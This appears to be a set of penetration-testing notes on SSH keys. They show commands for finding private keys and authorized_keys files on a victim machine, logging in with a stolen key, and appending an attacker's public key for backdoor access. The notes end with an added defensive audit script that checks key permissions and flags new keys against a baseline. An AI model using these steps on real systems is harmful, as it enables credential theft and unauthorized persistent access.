SSH Keys
id_rsa, id_rsa.pub, authorized_keys
What is an SSH keypair?
When we generate an SSH key using ssh-keygen, we are actually generating an RSA public/private key pair (RSA is the default type on older OpenSSH releases; newer ones default to Ed25519 and name the files id_ed25519 and id_ed25519.pub):
Public key: id_rsa.pub
Private key: id_rsa
SSH without a password requires that your SSH public key id_rsa.pub is included in the target account's authorized_keys file (normally ~/.ssh/authorized_keys).
Enumeration
Search for SSH private keys:
find / -name id_rsa 2>/dev/null
Search for authorized_keys files (the list of authorized public keys, so no password is needed when connecting over SSH):
find / -name authorized_keys 2>/dev/null
SSH without Password
Once we get an SSH private key from the victim machine, we can try to SSH in without a password. Note that the matching public key must be present in the target account's authorized_keys.
Give the private key appropriate permissions (ssh refuses a private key that is readable by other users):
chmod 600 id_rsa
SSH in:
ssh -i id_rsa <username>@<remote_ip>
~/.ssh/authorized_keys
If ~/.ssh/authorized_keys is writable on the victim machine, we can generate an SSH keypair and add the generated public key to this file. This will allow us to SSH into the victim machine using the generated private key.
Generate an SSH keypair on the attack machine:
ssh-keygen -f mykey
Add the single line from mykey.pub to ~/.ssh/authorized_keys on the victim machine:
echo "<mykey.pub>" >> ~/.ssh/authorized_keys
Give the private key appropriate permissions:
chmod 600 mykey
SSH in:
ssh -i mykey <username>@<remote_ip>
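As an added defender-side example (not part of these notes), a POSIX shell audit that looks for the same conditions the enumeration and authorized_keys sections above rely on: private keys readable by other users, authorized_keys files that someone other than the owner can append to, and keys that have appeared in an authorized_keys file since a known-good baseline was taken. The scan root, the baseline file and the fixture data are assumptions constructed for the example.

```shell
#!/bin/sh
# Added audit helper, not part of the original notes: scans a tree for the
# conditions the notes above rely on (loose private-key permissions,
# authorized_keys files others can append to) and diffs an authorized_keys
# file against a known-good baseline. The scan root is an assumed argument.

# Private keys whose mode grants any read/write bit to group or other.
loose_private_keys() {
    find "$1" -type f \( -name id_rsa -o -name id_ecdsa -o -name id_ed25519 \) \
        \( -perm -040 -o -perm -020 -o -perm -004 -o -perm -002 \) 2>/dev/null
}

# authorized_keys files writable by group or other (an append is enough).
writable_authorized_keys() {
    find "$1" -type f -name authorized_keys \( -perm -020 -o -perm -002 \) 2>/dev/null
}

# Lines of authorized_keys file $2 whose "type blob" pair is absent from
# baseline file $1; options and comments are ignored so a cosmetic edit
# cannot hide a new key.
unexpected_keys() {
    awk 'function keypair(   i) {
             for (i = 1; i <= NF; i++)
                 if ($i ~ /^(ssh-|ecdsa-|sk-)/) return $i " " $(i + 1)
             return ""
         }
         FILENAME == ARGV[1] { if ((k = keypair()) != "") seen[k] = 1; next }
         /^#/ || NF == 0 { next }
         { k = keypair(); if (k != "" && !(k in seen)) print }' "$1" "$2"
}

# Builds a throwaway directory of constructed sample data and prints its path.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/alice/.ssh" "$d/bob/.ssh"
    printf 'ssh-ed25519 AAAAC3FAKEKEY1 alice@laptop\n' > "$d/alice/.ssh/authorized_keys"
    printf 'ssh-rsa AAAAB3FAKEKEY2 bob@laptop\nssh-ed25519 AAAAC3FAKEKEY3 mykey\n' \
        > "$d/bob/.ssh/authorized_keys"
    printf 'ssh-ed25519 AAAAC3FAKEKEY1 alice@laptop\nssh-rsa AAAAB3FAKEKEY2 bob@laptop\n' \
        > "$d/baseline.txt"
    printf 'PLACEHOLDER PRIVATE KEY\n' > "$d/alice/.ssh/id_rsa"
    printf 'PLACEHOLDER PRIVATE KEY\n' > "$d/bob/.ssh/id_rsa"
    chmod 600 "$d/alice/.ssh/authorized_keys" "$d/alice/.ssh/id_rsa"   # correct
    chmod 666 "$d/bob/.ssh/authorized_keys"                            # world-writable
    chmod 644 "$d/bob/.ssh/id_rsa"                                     # world-readable
    echo "$d"
}
```

On a real host, run the three functions against /home (or /) and against each user's authorized_keys with a baseline captured at provisioning time; any output is a finding to investigate.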